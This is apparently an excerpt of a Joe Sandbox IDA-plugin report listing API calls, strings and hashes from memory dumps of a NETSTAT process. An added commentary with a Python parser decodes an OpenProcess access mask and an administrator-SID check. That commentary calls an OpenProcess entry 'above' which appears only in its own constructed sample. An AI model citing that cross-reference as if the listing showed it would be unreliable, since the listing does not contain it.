                                                                                                                                                                            • Opcode Fuzzy Hash: 5d4d73faed2c7e3f98ab71b3fae522d8f7ab8fb248726729c9b4ea922b93a74b
                                                                                                                                                                            • Instruction Fuzzy Hash: E2D01232040304BFC7102BE1EC0CA4A3F2AEB44312F845600F30D87020DF314489DB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00686012
                                                                                                                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00686021
                                                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0068602A
                                                                                                                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00686033
                                                                                                                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00686048
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                            • Opcode ID: c8380f786d8a0ebae8fa1a6685a9e8fdace677405deb564680587443565ffd67
                                                                                                                                                                            • Instruction ID: 98ca1eb1e5d6bb84225c34cc938d8b0a7255723cf8d33198db1bb0e8cc5f8331
                                                                                                                                                                            • Opcode Fuzzy Hash: c8380f786d8a0ebae8fa1a6685a9e8fdace677405deb564680587443565ffd67
                                                                                                                                                                            • Instruction Fuzzy Hash: 661118B1D01208EFCB11DFB8DA4869EB7F6FF58310FA15AA5E502E7250EB309A008B44
                                                                                                                                                                            APIs
                                                                                                                                                                            • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,000000FF), ref: 006858E7
                                                                                                                                                                            • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 006858FC
                                                                                                                                                                            • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 0068590F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3429775523-0
                                                                                                                                                                            • Opcode ID: 4c93aa3a733c309acd1dd2790c2e35265dedb9784929cdbaab343861525c6e32
                                                                                                                                                                            • Instruction ID: 185498042c3990da7c8dae19645aeccd7dae5daf2a67dba08438eef1875caa10
                                                                                                                                                                            • Opcode Fuzzy Hash: 4c93aa3a733c309acd1dd2790c2e35265dedb9784929cdbaab343861525c6e32
                                                                                                                                                                            • Instruction Fuzzy Hash: BA011AB191020AAFDF00DFE4CD899BEB7B9FB08300F90166AE512A3140DB749A05CB20
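Two entries above are worth decoding by hand: the OpenProcess call at ref 00683937, whose first argument 00000410 is a PROCESS_* desired-access mask, and the AllocateAndInitializeSid / CheckTokenMembership / FreeSid sequence at ref 006858E7, whose arguments (2, 00000020, 00000220) are a sub-authority count and two RIDs. The Python script below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses entries in the shape of this listing into records and decodes those two argument patterns. The SAMPLE text is constructed from the two entries on this page; the regular expression and the constant table are the example's own. Because AllocateAndInitializeSid receives the identifier authority by pointer (shown as "?" in the listing), the SID decoder takes the authority as a parameter and assumes SECURITY_NT_AUTHORITY (5), the authority that RIDs 32 and 544 belong to.

```python
"""Parse Joe Sandbox IDA-plugin function entries and decode selected Win32 arguments.

Added example; not code from the Joe Sandbox report.  SAMPLE is constructed
from two entries on this page; the regex and constant table are the example's own.
"""
import re
from typing import Dict, List, Union

Arg = Union[int, str, None]  # 8-hex-digit dword -> int, '?' -> None, anything else -> raw text

# Constructed sample in the shape of the listing above (two function entries).
SAMPLE = """\
APIs
• memset.MSVCRT ref: 0068391B
• OpenProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000410,00000000,?,00000000,?,00000000), ref: 00683937
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00683B39
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: Free$LibraryLocalOpenProcessmemset
• String ID: I_QueryTagInformation$\\advapi32.dll$rundll32.exe$svchost.exe$Dh
APIs
• AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,000000FF), ref: 006858E7
• CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 006858FC
• FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 0068590F
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
"""

# One API line: optional "Part of subcall function XXXX:" prefix, Name.Module, optional (args), ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Process-object access rights (winnt.h values).
PROCESS_ACCESS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok  # e.g. 'Function_00005D70' or a pointer the plugin rendered as text


def parse_listing(text: str) -> List[dict]:
    """Split the listing at each 'APIs' header; collect calls, String ID entries and source file."""
    entries: List[dict] = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            entries.append({"calls": [], "strings": [], "source": None})
            continue
        if not entries:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            entries[-1]["calls"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": [parse_arg(a) for a in raw.split(",")] if raw else [],
                "ref": int(m.group("ref"), 16),
            })
        elif s.startswith("• String ID:"):
            entries[-1]["strings"] = [x for x in s[len("• String ID:"):].strip().split("$") if x]
        elif s.startswith("• Source File:"):
            entries[-1]["source"] = s[len("• Source File:"):].strip()
    return entries


def decode_mask(mask: int, table: Dict[int, str]) -> List[str]:
    """Expand an access mask into flag names; bits the table does not know are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    known = 0
    for bit in table:
        known |= bit
    if mask & ~known:
        names.append("0x%X" % (mask & ~known))
    return names


def sid_from_allocate_call(args: List[Arg], authority: int = 5) -> str:
    """Rebuild the SID from AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0..sub7, ppSid).

    The identifier authority is passed by pointer and appears as '?' in the listing, so the
    caller supplies it; 5 (SECURITY_NT_AUTHORITY) is an assumption, not read from the dump.
    """
    count = args[1]
    if not isinstance(count, int) or not 1 <= count <= 8:
        raise ValueError("nSubAuthorityCount not recoverable from listing")
    subs = args[2:2 + count]
    if any(not isinstance(x, int) for x in subs):
        raise ValueError("sub-authority not recoverable from listing")
    return "S-1-%d-%s" % (authority, "-".join(str(x) for x in subs))


def annotate(entry: dict) -> List[str]:
    """Human-readable notes for the calls this example knows how to decode."""
    notes = []
    for call in entry["calls"]:
        args = call["args"]
        if call["name"] == "OpenProcess" and args and isinstance(args[0], int):
            notes.append("OpenProcess access 0x%X = %s" % (args[0], " | ".join(decode_mask(args[0], PROCESS_ACCESS))))
        elif call["name"] == "AllocateAndInitializeSid":
            notes.append("AllocateAndInitializeSid builds %s (authority assumed)" % sid_from_allocate_call(args))
    return notes


if __name__ == "__main__":
    for entry in parse_listing(SAMPLE):
        print([c["name"] for c in entry["calls"]], entry["strings"])
        for note in annotate(entry):
            print("   ", note)
```

Run on the sample, 0x410 decodes to PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which is the access needed to read another process's modules and, together with the I_QueryTagInformation, svchost.exe and rundll32.exe strings in the same function, is consistent with netstat resolving the owning executable and service tag for its output rather than with writing into the target. The second entry builds S-1-5-32-544 (BUILTIN\Administrators) and passes it to CheckTokenMembership, the standard "is the caller an administrator" check; the decoder refuses to guess when the count or a sub-authority is shown as "?" instead of silently producing a wrong SID.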
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00005D70), ref: 00685DC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: f61d76d868f8ebb02eb65a9e8bd707fd5856ee8e2013446031866fcf2b1b7f00
                                                                                                                                                                            • Instruction ID: 1841b24def8d8ae7c57c8fa7ad3c6c5482eef932eafc0b045ea736a2b2ad6a94
                                                                                                                                                                            • Opcode Fuzzy Hash: f61d76d868f8ebb02eb65a9e8bd707fd5856ee8e2013446031866fcf2b1b7f00
                                                                                                                                                                            • Instruction Fuzzy Hash: 089002702D1F005E8740A7705D0D50525A25E586027C21650A642C9094DF5040445B15
                                                                                                                                                                            APIs
                                                                                                                                                                            • fflush.MSVCRT ref: 00684740
                                                                                                                                                                              • Part of subcall function 00684530: _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                              • Part of subcall function 00684530: _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684760
                                                                                                                                                                            • _setmode.MSVCRT ref: 00684768
                                                                                                                                                                            • wcschr.MSVCRT ref: 0068478B
                                                                                                                                                                            • _fileno.MSVCRT ref: 006847B1
                                                                                                                                                                            • _setmode.MSVCRT ref: 006847B9
                                                                                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0068203C), ref: 006847D7
                                                                                                                                                                            • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000,?,?,?,?,?,?,?,0068203C,00000000,?,00000000,000000FF), ref: 006847E7
                                                                                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,0068203C), ref: 00684805
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684812
                                                                                                                                                                            • _write.MSVCRT ref: 0068481A
                                                                                                                                                                            • fwprintf.MSVCRT ref: 0068482B
                                                                                                                                                                            • fflush.MSVCRT ref: 00684835
                                                                                                                                                                            • _fileno.MSVCRT ref: 0068483E
• _setmode.MSVCRT ref: 00684846
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00684853
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
• String ID: %ls$< h
• API String ID: 2233937912-358708526
• Opcode ID: c21246baeec8aa230ab8ca2e8a2e371a8e321b65c3bff9bac818d98c45d0b137
• Instruction ID: 608ac2bccc40b84a426586da7661fc4a92fce21e05e5fc8da831a0cd917c0ceb
• Opcode Fuzzy Hash: c21246baeec8aa230ab8ca2e8a2e371a8e321b65c3bff9bac818d98c45d0b137
• Instruction Fuzzy Hash: 49319072900216FFEB116BA0EC4DFEE7B7AEB45721F604629F511E2290EF7499018B54
APIs
• time.MSVCRT(00000000,00000000,000000FF), ref: 0068495F
• GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00684975
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068497F
• LoadLibraryExA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000), ref: 006849C7
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,SnmpMgrOidToStr), ref: 006849D7
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: AddressDirectoryErrorLastLibraryLoadProcSystemtime
• String ID: SnmpExtensionInit$SnmpExtensionQuery$SnmpMgrOidToStr
• API String ID: 698272139-2433094189
• Opcode ID: 4d6c639ba7aad67b50a61a5ee4da02b0aa0cd40707b9d73e91d898387c32be62
• Instruction ID: 9cfb5cb3dd0dfb98d42394f8726132c617a807b02356fd50d943a0b182152de5
• Opcode Fuzzy Hash: 4d6c639ba7aad67b50a61a5ee4da02b0aa0cd40707b9d73e91d898387c32be62
• Instruction Fuzzy Hash: C331E77160021ABFCB14EFB0DD49AEA37AFAB04300B10539AE945E7240DF70CE45CB90
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 65f8ca5edbbf6d8abc44df2caa3a8f6fd60cce15f357e2a1a1521daf25ef57d2
• Instruction ID: 780c30426e0c793536f634bef622640307accc13fc9daa6788257491f31680aa
• Opcode Fuzzy Hash: 65f8ca5edbbf6d8abc44df2caa3a8f6fd60cce15f357e2a1a1521daf25ef57d2
• Instruction Fuzzy Hash: 9251E7B5E00216BFCF25EB98889097EF7F8BF0D2007158969E465D7641D334DE518BA4
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: fee2cf9eb3fa308f0dc9dff7b260952a4fa3e0966d9992f5a3be9874afbd5e71
• Instruction ID: 16581ce90b37c8d515dc9c7c0b59331b8a32c9cac5e3c5d5cb20521e0fcc2845
• Opcode Fuzzy Hash: fee2cf9eb3fa308f0dc9dff7b260952a4fa3e0966d9992f5a3be9874afbd5e71
• Instruction Fuzzy Hash: 125106B9A04A45AFDB30DF9CC8908BEB7F9EB4C200B048C5AE6A5D7641D7B4DA418760
APIs
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006845D1
• _wcsicmp.MSVCRT ref: 006845F2
• _wcsicmp.MSVCRT ref: 0068460D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: _wcsicmp$EnvironmentVariable
• String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
• API String ID: 198002717-1479523454
• Opcode ID: 2a39c42926dc38ad0cf8ca1286c000df6a52db20fc3e15a95c1a1bb663587337
• Instruction ID: 062635252ef1444355d205ec7a26b2bb18ad6c9a62b7e93b7b8f77b7d4720d84
• Opcode Fuzzy Hash: 2a39c42926dc38ad0cf8ca1286c000df6a52db20fc3e15a95c1a1bb663587337
• Instruction Fuzzy Hash: E711BF35600307AFDB24AB20DC19BEA77EEDF46324F51065AE041D6180FFB09AC1CB15
APIs
• GetHostNameW.WS2_32(00687CD8,00000104), ref: 0068365F
• wcschr.MSVCRT ref: 00683676
• GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836A2
• GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836C9
• GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006836F5
• GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00683726
• wcschr.MSVCRT ref: 00683783
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: Name$Info$wcschr$Host
• String ID: %s:%s$[%s]:%s
• API String ID: 3401028553-3707195743
• Opcode ID: c702a4e066380ed06404762d85d8cf3eab98e4525383d37f89003832600304e6
• Instruction ID: 87fe0cc86619d20170137af691c415afcbcca67dab5fba60a3436081753829ce
• Opcode Fuzzy Hash: c702a4e066380ed06404762d85d8cf3eab98e4525383d37f89003832600304e6
• Instruction Fuzzy Hash: 2D51C1B1A00229AFDF24AF14CC40AEA777EEF45B01F5042A9F649A7350E7709F85CB55
APIs
  • Part of subcall function 00681C89: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0068222F), ref: 00681CA2
  • Part of subcall function 00681C89: OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0068222F), ref: 00681CA9
  • Part of subcall function 00681C89: AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00681CD9
  • Part of subcall function 00681C89: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681CE7
  • Part of subcall function 006848A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006843B7,0000275D,00000000,00000000,?), ref: 006848CA
• NsiAllocateAndGetTable.NSI(00000001,00681100,00000002,?,0000003C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,?,00000000,000000FF), ref: 006829C3
• NsiAllocateAndGetTable.NSI(00000001,00681100,00000003,?,00000020,00000000,00000000,00000000,00000000,?,00000008,?,00000000), ref: 00682A02
  • Part of subcall function 006835EE: GetHostNameW.WS2_32(00687CD8,00000104), ref: 0068365F
  • Part of subcall function 006835EE: wcschr.MSVCRT ref: 00683676
  • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006836F5
  • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00683726
  • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836A2
  • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836C9
  • Part of subcall function 006835EE: wcschr.MSVCRT ref: 00683783
• NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00682C07
• NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00682C1B
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C2C
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C37
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C48
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C59
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C6A
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C7B
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: Free$Local$Name$InfoTable$AllocateProcessTokenwcschr$AdjustCloseCurrentFormatHandleHostMessageOpenPrivileges
• String ID:
• API String ID: 3162703053-0
• Opcode ID: 6f96b010d20cbb898c9597897e785d85e85a5d27cca653103b7ac9b8f1f26579
• Instruction ID: 9d3b66a8f6f8b8e7be01aa7e688d9b5b59a74c2839f11bf8c9b0391a0a0aefa7
• Opcode Fuzzy Hash: 6f96b010d20cbb898c9597897e785d85e85a5d27cca653103b7ac9b8f1f26579
• Instruction Fuzzy Hash: 81E15171D08319AFEB61AF54CC85BE9B7BAEB04344F044199F50DA6281DBB8AEC4CF51
APIs
• NsiAllocateAndGetTable.NSI(00000001,00681118,00000003,00000017,00000038,00000000,00000000,00000000,00000010,?,00000020,006824B9,00000000,00000000,0000274F,00000000), ref: 00681DB3
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006824AD,?,?,?,?,?,?,?,?,?,?,?,006824B9,00000000), ref: 00681DDA
• NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006824B9), ref: 00681DF0
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006824AD,?,?,?,?,?,?,?,?,?,?,?,006824B9,00000000), ref: 00681E0B
• memset.MSVCRT ref: 00681EBB
• NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006824B9), ref: 00681F71
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Table$AllocFreeHeap$Allocatememset
                                                                                                                                                                            • String ID: 8$p^v
                                                                                                                                                                            • API String ID: 1604459968-753539834
                                                                                                                                                                            • Opcode ID: 328c12449aaaffafbe111976d71d587b685cf133c75941bb20e4f05af5548c99
                                                                                                                                                                            • Instruction ID: 3eca3a473645dc65a4ab61e4cc2d1d6dd3b7628ddac6b052aa3194326b69b0bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 328c12449aaaffafbe111976d71d587b685cf133c75941bb20e4f05af5548c99
                                                                                                                                                                            • Instruction Fuzzy Hash: A281D7B5D00219EFDB14DF98C981AADBBB9FF09314F24819AE905AB341D371AE42DF50
                                                                                                                                                                            Strings
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031B46FC
                                                                                                                                                                            • Execute=1, xrefs: 031B4713
                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 031B4787
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 031B4725
                                                                                                                                                                            • ExecuteOptions, xrefs: 031B46A0
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 031B4742
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 031B4655
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 578fd42226a121e63dd24a5ce152f0d839355ed076f08d1a622f7fec05978362
                                                                                                                                                                            • Instruction ID: 7e1ed0b7e8b0e19d72a4006c68f701402da12e501dbef922b24d8ce45c4e0165
                                                                                                                                                                            • Opcode Fuzzy Hash: 578fd42226a121e63dd24a5ce152f0d839355ed076f08d1a622f7fec05978362
                                                                                                                                                                            • Instruction Fuzzy Hash: C151E735A003197BEB21EBA5DC99BFD77B8AF0C700F0800A9E505AB1C1EB71AA45CF50
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00684530: _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                              • Part of subcall function 00684530: _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                              • Part of subcall function 006845AB: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006845D1
                                                                                                                                                                              • Part of subcall function 006845AB: _wcsicmp.MSVCRT ref: 006845F2
                                                                                                                                                                            • fgetpos.MSVCRT ref: 00684697
                                                                                                                                                                            • _fileno.MSVCRT ref: 006846B1
                                                                                                                                                                            • _setmode.MSVCRT ref: 006846B9
                                                                                                                                                                            • fwprintf.MSVCRT ref: 006846C5
                                                                                                                                                                            • fgetpos.MSVCRT ref: 006846DE
                                                                                                                                                                            • _fileno.MSVCRT ref: 006846F8
                                                                                                                                                                            • _setmode.MSVCRT ref: 00684700
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684710
                                                                                                                                                                            • _write.MSVCRT ref: 00684718
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2328354365-0
                                                                                                                                                                            • Opcode ID: ec48e614614e60b8909a0bf390db4105078d7f013943f0eaa6fcada2de940d97
                                                                                                                                                                            • Instruction ID: c61a67c060e39622a77d32a60f2fe12431a351d2cf0995e7c6f151f5b4592347
                                                                                                                                                                            • Opcode Fuzzy Hash: ec48e614614e60b8909a0bf390db4105078d7f013943f0eaa6fcada2de940d97
                                                                                                                                                                            • Instruction Fuzzy Hash: ED112131900216FFDB14BBE0EC4E9DE77AAFF06362B600655E441E2680EF749A018755
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00686160,0000000C), ref: 00685A30
                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00685A45
                                                                                                                                                                            • _initterm.MSVCRT ref: 00685A99
